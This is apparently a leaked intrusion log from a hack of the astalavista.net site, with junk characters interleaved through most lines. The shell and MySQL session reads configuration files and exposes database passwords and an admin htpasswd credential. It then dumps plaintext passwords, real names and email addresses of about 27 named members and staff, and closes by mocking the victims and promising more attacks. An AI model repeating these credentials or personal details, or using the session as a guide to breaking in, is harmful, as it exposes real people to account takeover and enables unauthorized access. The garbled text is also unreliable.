7 a8 q$ Q. _/ j7 s8 h" N. |total 48
4 j/ R% r6 X9 t6 b$ D; Adrwx–x–x  6 astanet astanet 4096 Dec 23 15:55 ./ A) k8 W7 r9 m* I
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
) ]+ t6 w" ~- ndrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
9 a' J8 J" s6 e-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
! L! x; U, q  @8 D! Y! R-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
7 q% q, C3 x* l2 c2 Z( W& q-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile/ F* @3 ^8 a* R/ i9 o% _5 e3 {& i
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc1 t& Y4 o  m8 I" v
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
& L. r% t9 i  T* _3 b4 b* V" D7 p: Zdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
+ _0 j! d; o4 w' ?  L+ r# Adrwx——  2 astanet astanet 4096 Dec 23 12:18 mail
$ D3 G$ I6 G. A" l0 E  Plrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
) c2 v0 I) v) P$ Q6 r! n-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow  B. S( x9 g: ~# i+ P  @# l

9 }" g0 G; }7 Lsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
# c2 _0 j& V4 @% Csh-3.2$ ls -la
' ^: `6 w5 W9 G' V$ g% Btotal 200
* ]8 D" r+ j. T' H' P" ]) h/ E9 Idrwxr-x— 29 astanet apache   4096 Jan  6 13:58 .# J# C& w- M. \4 o" j. }# z
drwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
/ |  V9 D5 Q0 L. y7 O& ydrwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007) c2 s% O: f! J- v
drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
( u' s% \9 k; p- D& ]- e+ h' G( Kdrwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com3 c6 n3 I' o/ }" X( [8 j
drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend. `* M: z7 S2 I: B& B8 B
drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner! p! P8 {! J' ?6 ]) |* _
-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg
6 L- r5 X- C; b% w  B8 N6 Sdrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config5 U2 R  ]5 J3 ~
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron4 F& P( ]3 D8 y: v$ d8 {' J1 b
drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd, J; [+ j  L# r" U0 g- A5 H8 [. _
-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
& b% x4 C% f4 p' C) @# {+ j& v; b-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico( C4 X  H: P: P. f; H
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
7 y- w" g! X9 @  O1 F2 ?( Z/ Edrwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour1 u1 h2 J* w. d: P. T$ U
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess
2 c' B* l- f# o$ B-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess
" ^1 W  y9 V$ z+ U; H$ U, z( U4 J. Y-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php
- q( p' N, \; k6 c% H" P-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html
" j  q# U7 N0 \# H2 @) v/ l( u-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
$ [5 h. G4 X6 I1 w. C" K: a' U-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php! h  Y* H9 Z4 E1 S! g+ {
-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf
, B1 J4 s# O8 O4 ]6 ~: Udrwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
9 r" S# t+ }7 S1 J- u2 Udrwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
# t% p; ~7 I6 Y6 B4 Q4 c# [6 Jdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib# j  F! g: s+ N* ]3 b% [& x; P
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log" U' S- t+ z! @3 s* |( `9 W
drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
) B7 v$ T2 G* k! Q; Q8 |drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata6 @) E2 @; l: f. I' r% Y$ F0 \9 h; N+ B
drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new2 D/ L( Z* L  n9 ]) b7 }: q9 v* ]
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf& Y1 v/ [9 x- o( [. a
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
7 \' w8 u7 C8 Q3 @-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt
9 ^7 k3 R. \- g2 u& X  Pdrwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
4 E+ x6 E  M+ C# O" o2 wdrwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources! t- |0 M2 @5 y, J+ ]
drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com- |" G# o+ E1 R% |
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes2 N: ?0 B0 Q+ J$ T9 `3 P7 I+ t
drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
. F* A$ M4 S! ddrwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl. [! y  g. T: Q6 r+ u1 J
drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2$ Z) x8 H% e: |9 o* b- Q5 _
drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old5 U0 s& ]% z- W+ D1 q( z; Y
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php6 [! L! h' B" x% q7 V' O/ F7 r
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki$ J" I4 {( G4 p

6 {) T; a" }; x  L+ Jsh-3.2$ head -20 index.php
6 ?1 U9 W5 y( H0 ^( X9 W5 G5 f8 Q<?PHP
! I2 u' U( `) |8 @9 E3 ^/**
% M8 l8 u  g) x& |' _( f* Mainfile (external) for astalavistaNET v2.0
6 V3 E" h: o+ ]5 y) Z*
9 w' O. D. ^2 R' f* g1 Y7 p7 g8 q, Z* @copyright     Astalavista IT Engineering GmbH& x& r& c/ \0 S
* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>: i9 Q& \7 k% @
* @version       1.0
0 t( d5 l6 U' q4 c; u* ?6 c. M! W*/, m/ A7 J7 ^/ `, C* C' d( ~: R
, y: I  |1 w' Z' R* p! w, L
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {4 M6 B' \# L: X
                $dontStartSession = false;" f& f" |) \- H/ |' p5 M# y
        } else {* G- |* R1 f- t9 d0 l' u9 s
                $dontStartSession = true;
( G3 h% {1 e; W# q        }' e- C9 I7 c/ L$ q
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);; D3 s4 D" U4 P* r4 l
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);6 Y; L9 k; S7 {9 X4 @4 [
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);; C) `, @/ ?8 L6 m5 o
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
' ^3 y/ J( ~0 k9 {+ E3 z2 e/ b+ o' L, q% M, ~' R* u$ r
sh-3.2$ cd config2 M. R. E# M. W& W
sh-3.2$ ls -la
" e( m1 B& ]& Z4 m( Z1 S6 ptotal 323 y. T1 N$ M% V: Y( N# [
drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
: J, B+ Q4 M- \9 ]2 X$ ~5 ]drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..& X7 X' O  x3 \4 W: L% r
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php% ~; n0 z$ c( P2 p
-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
; O) f6 T4 Y, Z1 ]1 \# C-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
5 O, v. X2 J% D8 M7 p/ l-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
# ]8 u( y$ n; u# ^6 }' U-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php. U1 [$ B8 Y8 k% n

5 a% Y( W- W7 y$ Dsh-3.2$ cat com.conf.php
) B4 z. j, Q# [8 Y  R  U[snip]
9 O3 D5 y( J; {" A//member-database! O# X1 T! `: m- g. o' X2 u  ?
$_CONFIG['db_mem_server']       = ‘localhost’;
/ D, ?3 l3 K5 ]$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;2 U4 H8 M  H/ R$ L' v
$_CONFIG['db_mem_user']         = ‘astanet_db’;7 D, w% J% A. ^  h' _& s
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
  q, `" ]  J% E/ J$_CONFIG['db_mem_debug']        = false; //true or false, R$ `. |9 ]6 A" g$ s
//ads-database  h) L0 J( b- S9 f
$_CONFIG['db_ads_server']       = ‘localhost’;, K; k; _0 }+ i5 T
$_CONFIG['db_ads_database'] = ‘astanet_ads’;. m; I7 e* I# @6 d
$_CONFIG['db_ads_user']         = ‘astanet_db’;1 \+ r. y+ L  x6 Q
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
3 q- _$ N0 D5 ~$_CONFIG['db_ads_debug']        = false; //true or false7 n4 L$ O6 [2 b3 v" l
//rainbow-database+ R% U' V- ^$ [$ R( B9 i
$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;
! b: T$ O, u) I3 I# z5 f/ ]$ e+ m$_CONFIG['db_rainbow_database'] = ‘rainbow’;
1 [+ z% k. y/ l# I$_CONFIG['db_rainbow_user']     = ‘dinu’;2 E0 C8 [1 M4 ^! e3 G. @4 q4 l$ `# z
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
( l) _! O0 t6 s' Y4 U% l9 ^$_CONFIG['db_rainbow_debug']    = false; //true or false" B! g1 J7 `* B
//mailing lists database
7 f2 z" @- |. d7 }6 m4 ^7 m4 |' K$_CONFIG['db_mailing_lists_server']     = ‘localhost’;
$ c7 W  L5 o* U7 z$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;
& r! t1 u8 E# g1 V5 W$ ?! r, u$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;6 m/ S# f) u- y3 |. U6 p) M% g
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;
& R+ v' b$ i/ {& y0 q: {5 k) y$_CONFIG['db_mailing_lists_debug']              = false; //true or false
& a; Q4 x3 G1 D. h' f! F* y//paypal
$ t: k  t  e* g8 K$ i+ `$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;( ^9 w" q$ Q+ ?* z% L
$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
3 H/ _9 ]# A; z8 r7 B+ N$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
& H8 k' ]  N% I8 ~$_CONFIG['sub_pp_noship']       = ‘1′;! m5 p0 H! m4 X: d& E
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;
. v9 ], h  t* ^$ G/ H. f[snip]
; H( r3 u# L4 x  y# e: W! K
  v& p; p3 e0 E  j# f6 x' Fsh-3.2$ cd ..
1 J0 W( B% K+ W- j: {3 \9 msh-3.2$ cd member" X1 L& Q( F7 j) l; A2 k
sh-3.2$ ls -la4 x! R8 A) O; L2 A
total 20
, K0 K% x5 y7 x* O  adrwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .4 G& I9 z( Y% v! C
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..2 r% d6 Y" a' }. ~8 V( D
-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess
# \0 j8 X  q6 q! Q8 r. w5 [-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php; S0 W" v0 S2 _% g8 Z/ R% r
sh-3.2$ cat .htaccess
+ N9 Q9 u5 f; r* ~& jSecFilterEngine off
- P/ \, y" |+ Z* w
+ I3 ]' p! Q* D4 K" F; dsh-3.2$ cd ..
: Z) U8 q' s* s1 m; o, ~' Fsh-3.2$ cd cron2 _/ e0 T! a* d
sh-3.2$ ls -la
1 E! U5 t- `: Ltotal 168  e! V  M2 Z% _$ m$ y! L- E) A
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .; U6 ~3 x* c3 D9 R" f& G: ~
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..' s) b' A  h! [2 r; P! b' _
-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
& N2 U. b! g0 k1 [8 p2 i% ?-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php, C( X+ O* J' s
-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php' d* |! v( {* B) z  M
-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php1 Q! ~* X& h" Y( h0 C  T$ e
-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php6 b0 K* L' x7 O* m0 @  r
-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php
+ _3 Y- A- ?; A5 k% p-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php/ r: i: J4 N3 `. ]6 K$ e; K
-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php# _- V8 r+ l! O3 T
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh% B6 n2 V' m% d0 T  p
-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php  ^: @5 `/ v* N+ M) P2 `
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php/ a- ?; J% J& b" o
-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php) f. W+ G( y, o) `' x, W* o0 k" x6 H
-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh! [, N6 X$ q, Y9 n1 r
-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php5 c& Q! p  r: b2 x$ h! D
-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
  m% L" [5 B- O6 [, w- v-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php, G  \: m0 T" D; I7 `- l+ O' T: ~
-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php
# R) ?5 _7 K4 V- [& w$ h* p9 D-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php
$ c6 h1 ~  k- K& z# wdrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
1 q6 g' Y7 e. l( I& v-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
2 @1 Q3 F  A5 C2 G; E-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
/ R0 M) w' p. R+ B( B& _
; a7 \# c( W! ?$ l5 R: [6 P2 x6 ~, [$ c$ A4 Jsh-3.2$ cd ..
! F4 m& u* u9 j" B9 ksh-3.2$ cd _007
) T$ B4 N! k0 z9 b3 n' @! K1 s( K# q+ fsh-3.2$ ls -la
6 V( g+ x; J, Wtotal 24
# F# g( M) O5 r. d' Z4 A8 Ldrwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .5 ]: w; q8 v3 n2 j' N
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
7 O) ]+ O  c  p) N- v2 K4 R-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess: ~" E* R# Y! ?7 `1 ~
-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php" V9 o5 f% W% ]% x, q' T8 ?
-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php# `3 J$ I3 t8 D" I
drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
, I( z2 F# g6 u, D
: j5 a8 W1 x$ H8 ~sh-3.2$ cat  .htaccess
& Z3 a0 V! g/ aauthType Basic
, X; J4 m) h/ a+ H% [, |  OauthName Admin
* J' o9 H/ q$ J9 r# D# ~authUserFile /home/astanet/auth/.htadm_pwd2 u- V2 U0 L: R* A/ B
require valid-user/ F# o4 J& y1 f4 j
. T' c+ m- ^, U: z
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
3 q$ O" P; @7 radmin2net:CR0bl65MwhfT; c  ]$ f/ N' }+ P
7 {/ u9 U3 |4 V5 D
sh-3.2$ mysql -u astanet_db -p
6 F# g2 r% \9 j7 u. MEnter password:0 f2 B; o* B/ w6 Q" ]- G  \* _" w- w
Welcome to the MySQL monitor.  Commands end with ; or \g.
9 X+ u% M; `& x1 Z' r2 E( C2 ^Your MySQL connection id is 275153
7 f; u$ \) g/ [6 VServer version: 5.0.45-community-log MySQL Community Edition (GPL)
; C; l1 S) d5 K/ W. I
+ @! g6 D# b8 ?/ s* B0 AType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
5 @5 v' l/ z0 F/ j* I1 \- |8 G2 b, ^4 [# S% @  [3 G7 D) n
mysql> show databases;# c4 d  f- @; W- _
+———————–+
! z5 v" S, F- l1 r# E| Database              |
+ s2 z. x$ w4 U8 }+———————–+8 k) N5 |3 x6 W$ A0 X9 _
| information_schema    |1 x. ^6 e6 h9 d: o7 o7 Y  c+ ?
| astanet_ads           |
: |4 }! r# ?; Q# p+ U" N% L. J: s| astanet_mailing_lists |
5 d# g1 m) |: d| astanet_mediawiki     |7 `- E- P4 g/ B- S3 `- q+ Q9 {
| astanet_membersystem  |( y9 @1 i4 j% v" @# l) h
| test                  |! z. I; P0 w! c
+———————–+9 {4 s# u$ J9 D  B( k, h7 L
6 rows in set (0.00 sec)
2 \2 T6 Q# E# t. m& Z5 K) w* r1 b+ w2 f7 m# L
mysql> use astanet_membersystem9 J' u$ }' U' ?
Database changed
- o1 P+ p; Q$ i' w/ ?mysql> show tables;% \8 i; ]& F- u% u
+———————————–+
# F( a$ u2 r8 y| Tables_in_astanet_membersystem    |
" I" u' P; z) r7 G2 i/ r) t5 f+———————————–+# W6 B" s- T# F5 G# F* H; h
| blacklist_categories              |
0 q" d- f4 }. J( Q| blacklist_content                 |- d1 ]- d9 O, f1 G+ ^! s
| blacklist_levels                  |3 @& q0 J: F" |- t% V- c
| blacklist_mcset                   |
* ]8 X& F* d0 I) q% i' G0 v; I| dir_categories                    |% ^& e& z& Q, F' B. a$ T
| dir_comments                      |
2 u0 R1 A2 U3 P| dir_links                         |) n, z4 X: W) ]2 R
| dir_temp                          |2 ?- o% z4 _! x0 @; U) [
| dir_votes                         |" f0 u' C! g$ v6 H
| documents                         |) x5 R1 {& H# A8 a! G
| documents_categories              |: r% Y+ O/ G1 P
| email_content                     |) d  \+ o$ ?% `, {( R% R
| email_settings                    |% C( H  l& ^: ^
| exploits                          |: D. _0 {( B9 r! k4 j
| exploits_categories               |& A8 E% i3 k! k9 f, ?
| exploittree_categories            |# v% m) i9 s" Z, h
| exploittree_exploits              |1 l4 V: Y7 _: D8 W
| home_values                       |
3 z- l- O9 C0 m% P" b3 }: |1 p8 }5 p| iso_countries                     |
# H  u( w, l. B4 @3 Y| links_categories                  |
7 W. w8 V4 T6 h2 q| links_records                     |
# c4 c" Y0 I- T* v% e* J! E| links_unauth                      |$ |, @, s( K' [/ L. n) t2 B* l
| links_votes                       |
/ ]$ V$ l/ c- |2 @, || log                               |4 d0 ^- i) B: ~9 O3 O
| news_categories                   |
3 H* f! y# ?: A2 {* Z+ v| news_comments                     |0 d% r3 n4 ?& l/ L0 c* K
| news_emoticons                    |: M- s. ^" M' U5 U7 d
| news_latest                       |0 r1 b) w. ]0 }; l/ ?0 T
| news_messages                     |1 X) u9 ?: T5 m7 j
| news_statistics                   |
/ w8 p% t8 u! Z6 X1 y* b| news_votes                        |
5 S: i" W  ?* x9 K# m| prices_content                    |+ b9 q% X! j' B* A% t3 o0 m4 j0 N
| prices_offers                     |
* \2 ~" u5 J4 Y* V$ }  S| rss_settings                      |2 U- Q& _/ T$ W. E" k
| sessions                          |
" c+ J7 T6 _) \9 A| stats_signups                     |& X" [5 ^: [# m& m6 L  Q
| u2u2                              |
- f. @+ v* b' |' @# f5 N+ i| u2u_contact                       |
, ]/ d% H- D2 d: g! ]| u2u_settings                      |4 `( S' O3 s# E% n; i$ X8 W
| user_keywords_selected_categories |
+ D1 u' ~/ W' u1 |! V- Z+ K/ K| users                             |
4 X( b( Q8 Q! K" || users_ipn_test                    |8 f, d; w7 H& B9 @
| users_keyword_values              |' C( |! A4 I1 s. w
| users_profile                     |
# i1 K  F/ L2 Z+ S4 o| users_temp                        |
/ B+ t" c8 k7 O+ C3 }| users_upgrade                     |
$ ~! Y7 c( [7 k+ C5 q+———————————–+
! y1 G) n2 {8 i' X0 l/ ~46 rows in set (0.00 sec)
9 \* L+ r5 G/ C% E) H# ?
; \& H7 _) w' n- N/ vmysql> describe users;8 w8 i$ S2 F, J2 P& m0 @& P9 w% T% B& S
+————————–+————————————–+——+—–+———————+—————-+
/ Q* ?' B) X9 W$ d, V| Field                    | Type                                 | Null | Key | Default             | Extra          |0 C) ?2 Z. u/ g; d: G9 r) f( j' M
+————————–+————————————–+——+—–+———————+—————-+1 Q- `5 o5 D* ?0 q+ _/ x+ J
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
7 a9 ~* ^5 H6 R0 u1 B, _| user                     | varchar(50)                          | NO   |     |                     |                |* t( R; `! Q/ s  R/ h/ D
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
* Z/ K: x  [7 L4 c" t0 N5 i| password                 | varchar(30)                          | NO   |     |                     |                |
/ B6 R: F7 T0 m% X. || userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |
( ?8 k, {, o- f; n1 c3 I| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |8 `% `1 u/ l9 g) _2 y
| email                    | varchar(50)                          | NO   |     |                     |                |0 d% d/ }1 n7 ~# c, J  h
| ip                       | varchar(15)                          | NO   |     | 0                   |                |0 c# v9 ~& l) P
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |- \% E9 |8 w5 E' a. `) @, ]
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
9 |/ ]% n% z) i- X% T| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |- M/ e2 `( u( P
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |  W! ]* d/ ]) p  {5 Z$ n7 A
| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
6 @* @; g, _# Z# O. |* {2 _- l| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |" J6 ]" o) l$ ~( D5 k0 t" l0 A
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |
+ `# G8 d& p9 u9 h. n| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |5 ]2 e! O. S2 o) M" {- u" C6 @8 I3 q
| lang                     | tinytext                             | NO   |     |                     |                |$ ?/ _5 o  d) q  N
| adid                     | smallint(6)                          | NO   |     | 0                   |                |
( ]5 v$ e1 _8 \- ^* X& ~' B8 t, O| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
- G! P7 U9 h* C. \| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
/ Y! H$ ^7 e/ ~' G0 c) c! e6 O| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |
4 j7 ]; _/ U' c" e) v& Z, C| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |) I# J( d" C8 Z0 ^9 t, Q6 b
+————————–+————————————–+——+—–+———————+—————-+, F1 Z' X( j! A% K4 D0 }6 {+ O
22 rows in set (0.01 sec)
) \; M) O" J" E- x8 k1 R9 ^: d6 p" U0 p1 |8 j1 o# D2 L/ Y
mysql> select count(*) as skids from users;
* G% K  U9 F2 d8 Z: N+——-+
1 K- W! G, r" a4 x| skids |4 @+ ?7 L5 B5 A) a( O4 `
+——-+
  {, u9 @  U% x) [| 25199 |3 g# Q! }4 G& e/ [- ^
+——-+
) X% [$ _2 ~, S! i0 e, ?7 d' [1 row in set (0.00 sec)
; y$ k: V+ L9 b6 O/ ?) n) h3 |
; l7 _  L) q1 Z0 X& C& {, Mmysql> select user,nickname,password,email from users where userlevel = 1;
- R4 ?6 l! G1 d. q8 l+————————–+———————-+——————+———————————–+
% i; {& z6 B  Y' V9 |, B$ m6 s| user                     | nickname             | password         | email                             |
# v9 K0 L2 D" y+————————–+———————-+——————+———————————–+% J9 O9 K1 @4 e$ ?5 }
| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |! s- g) X/ W- b7 a- Y
| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |2 F% x' E+ ~, M- }
| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |
# Y# X) n3 o; ?9 s| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |: q' h8 @6 S" F8 C$ M1 X) Q0 F
| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |
: m( @+ @  d  N| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |
/ n& X. Z# F, O: I* s| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |( u( n  {; z/ T. K
| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |
; u, ?- n- P" r$ t! K: T6 T" n| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |
, V% y: `" w. l| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |3 R, d6 }( Y8 ]. O% R
| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |0 j- U# f  }) K- V
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |7 j# ~/ V' q( b; u8 i. I& R, [  k
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
4 [+ N, p) L! M5 y+ D| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |) @5 V, Z3 x! B4 ~7 z: y
| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |
" Z4 `9 H$ l9 d2 j; t| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
: R: p5 P* J0 E' ~1 Z# U4 g| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |6 R3 F" a( R+ ?: v/ Q
| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |
' P4 ^* Y& @7 Z. s9 ]$ A' Y$ D6 ~, f| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |. Q' I' W; T& T
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |/ C9 x( L1 l, T/ D/ [' }$ t  D
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |
& G5 O7 x8 I1 L| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |
; k* d& _7 `6 S1 @4 h# r  c| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |/ R. k+ @: u6 h+ x3 z$ d( Q1 }
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |
9 Q5 m4 ~' X0 b% u, @: g7 R& l| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |
3 O: T( M+ [( z3 g0 x  s3 ?% b| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |
( x! W7 _/ r! Q$ w7 {| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
  v( X, T3 o5 F0 o+————————–+———————-+——————+———————————–+
4 B7 A+ \/ h8 _% G27 rows in set (0.00 sec)& [2 q+ f: S! v) k: ?
" q, G- r9 e  S/ L9 a+ n
mysql> exit;
1 x* w2 w$ }2 b6 j% {Bye2 k. u1 M/ V5 ?4 T/ q& A
' ^1 e6 {9 Q6 |; a" O3 d. h9 X( a
[~] plaintext passwords? yes,
7 ~% D) R3 k/ Z( g$ Z% MThose so called “security professionals” who charge you $6.66 / month to
; T" t! B. i$ L9 a- a" Vregister at their hack-proof portal, save your passwords in plaintext…
# i( p# V/ s2 Y- K9 b* T0 {' v9 Bbrilliant!
( [5 j1 {0 e. L
0 N; _' R1 G. h7 T8 z[~] This been fun but we want more.
